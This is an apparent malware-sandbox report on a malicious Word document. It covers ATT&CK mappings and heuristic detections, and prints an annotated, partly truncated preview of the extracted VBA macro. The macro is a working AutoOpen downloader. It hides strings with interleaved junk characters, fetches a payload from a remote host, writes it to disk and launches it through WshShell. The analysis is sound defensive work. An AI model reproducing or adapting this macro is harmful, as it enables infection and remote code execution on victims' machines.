Verdict: MALICIOUS
Risk score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro is configured to execute code, indicated by the 'Shell' execution token. The presence of an external relationship pointing to a local file path suggests an attempt to access or load external resources. The VBA script itself appears to be obfuscated, but the overall structure and heuristic firings strongly indicate a macro-based downloader designed to execute a secondary payload.
Heuristics (5)
- External relationship (high, OOXML_EXTERNAL_REL): External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\it.jpg
- VBA project inside OOXML (medium, OOXML_VBA; 2 related findings): Document contains a VBA project — VBA macros present
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4503 bytes | d5e7f7c086e02d1ca9fb96d97f7023e17586d175581fa5b1743a28ba4676f659 |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes | 9b1d7154c35e84254141460ef1cab8ca290a6bebaee17ef17d71e6799d814677 |

Preview of macros.bas (first 1,000 lines of the extracted script; the analyzer cuts the listing off mid-procedure):

```vba
' Concatenated module sources as emitted by olevba; each "Attribute VB_Name" line starts a new module.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module f66c011c: the single-line functions that read ActiveWindow/ActiveDocument
' properties or compute constants are never used by AutoOpen; they are padding
' meant to dilute the ratio of suspicious to benign tokens.
Attribute VB_Name = "f66c011c"
Function c38f44cd()
c38f44cd = ActiveWindow.DisplayScreenTips
End Function
Function f62b5f89()
f62b5f89 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function e59f855f()
e59f855f = 532 - 500
End Function
Function c0613fa1()
c0613fa1 = ActiveWindow.HorizontalPercentScrolled
End Function
' File writer: opens the path cded94e9 for output and writes the byte-converted
' form of c9546e5f (see c1523cf7) to it. This is how the downloaded body lands on disk.
Sub e81b2ff2(cded94e9, c9546e5f)
Dim effb4940
effb4940 = FreeFile
Open cded94e9 For Output As #effb4940
Print #effb4940, c1523cf7(c9546e5f)
Close #effb4940
End Sub
Function e4ddd386()
e4ddd386 = ActiveWindow.Visible
End Function
Function a2ae8a2f()
a2ae8a2f = ActiveWindow.Top
End Function
Function f1f5397e()
f1f5397e = -467779702
End Function
Function fa8553c5()
fa8553c5 = ActiveWindow.Visible
End Function
' String decoder: keeps only the characters at odd positions (1, 3, 5, ...) of its
' argument; every second character in the literals passed to it is interleaved junk.
' All paths, URLs and the host binary name below are stored in this form.
Function dc17e610(d91e1038)
d1f10956 = Len(d91e1038)
For de5b5c62 = 1 To d1f10956 Step 2
befc5edb = befc5edb & Mid(d91e1038, de5b5c62, 1)
Next
dc17e610 = befc5edb
End Function
Function e83c0304()
e83c0304 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function b7fe50c7()
b7fe50c7 = ActiveWindow.Hwnd
End Function
Function f7871cb1()
f7871cb1 = ActiveWindow.Index
End Function
Function fa0ba5b3()
fa0ba5b3 = ActiveWindow.Width
End Function
Sub d0db810b()
End Sub
Function c9b02c13()
c9b02c13 = ActiveWindow.DisplayVerticalRuler
End Function
Function d1f76ac3()
d1f76ac3 = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function ab5d48ed()
ab5d48ed = ActiveWindow.WindowNumber
End Function
Function b916b346()
b916b346 = 9287 * 2
End Function
' Auto-execution entry point (fires when the document is opened with macros enabled):
' 1. ae41a614 (class f5f0d66f) fetches the decoded URL over HTTP;
' 2. e81b2ff2 writes the response to a decoded local path with an image extension;
' 3. WshShell.exec launches the decoded host binary from a8ecfc4e with that file as its argument.
Sub AutoOpen()
Dim ab17e875 As New f5f0d66f
e81b2ff2 dc17e610("c5:c\8perbo2g7rea2m0d4a3tea4\36947613021.2j8p8gf"), ab17e875.ae41a614(dc17e610("hct0t7p7:f/e/fh3qa33l7l3.bcbodm5/2i5z551/byba2c9aa.6pah3p5?cl9=ak9p1te1f0b.4c6a4b6"))
Dim f2cc6d12 As New WshShell
f2cc6d12.exec a8ecfc4e & " " & dc17e610("c5:c\8perbo2g7rea2m0d4a3tea4\36947613021.2j8p8gf")
End Sub
Attribute VB_Name = "db2924bc"
Function ef33d5da()
ef33d5da = ActiveWindow.Index
End Function
Function abbe8847()
abbe8847 = Application.ActiveDocument.CompatibilityMode
End Function
Function c41853a3()
c41853a3 = ActiveWindow.SplitVertical
End Function
Function ef0d68ae()
ef0d68ae = Application.ActiveDocument.Application
End Function
' StrConv(..., 64) is vbFromUnicode: converts the response string to a byte string
' so the raw payload bytes, not UTF-16 text, are written by e81b2ff2.
Function c1523cf7(e81b3f72)
c1523cf7 = StrConv(e81b3f72, 64)
End Function
Function ada6c466()
ada6c466 = ActiveWindow.View
End Function
Function dc3a70db()
dc3a70db = ActiveWindow.VerticalPercentScrolled
End Function
Function e5886f05()
e5886f05 = Application.ActiveDocument.CurrentRsid
End Function
Function d2cd1c17()
d2cd1c17 = Application.ActiveDocument.ActiveTheme
End Function
Function bbacad32()
End Function
Function e0d4b9e9()
e0d4b9e9 = ActiveWindow.DisplayRightRuler
End Function
Function fe00acca()
fe00acca = Application.ActiveDocument.ActiveWindow
End Function
Function f06180ce()
f06180ce = 20419
End Function
Function f4c42c2e()
f4c42c2e = 7112 / 56
End Function
' Returns the decoded name of the host executable that AutoOpen passes to WshShell.exec.
Function a8ecfc4e()
a8ecfc4e = dc17e610("rfe8gds7verc3022")
End Function
' Class module f5f0d66f: the downloader. ae41a614 issues a synchronous GET with
' MSXML2.XMLHTTP30 (late-bound, so no project reference is needed); the preview
' stops before the response is read.
Attribute VB_Name = "f5f0d66f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function fb30fe37()
fb30fe37 = Application.ActiveDocument.ActiveWindow
End Function
Function fb7c2a67()
fb7c2a67 = 187
End Function
Function b3611a06()
b3611a06 = 22794 / 87
End Function
Function ec170d57()
ec170d57 = ActiveWindow.HorizontalPercentScrolled
End Function
Function ae41a614(cc03b823)
Dim c8d5d70b As Object
Set c8d5d70b = New MSXML2.XMLHTTP30
Call c8d5d70b.Open("GET", cc03b823, False)
c8
```
... (truncated)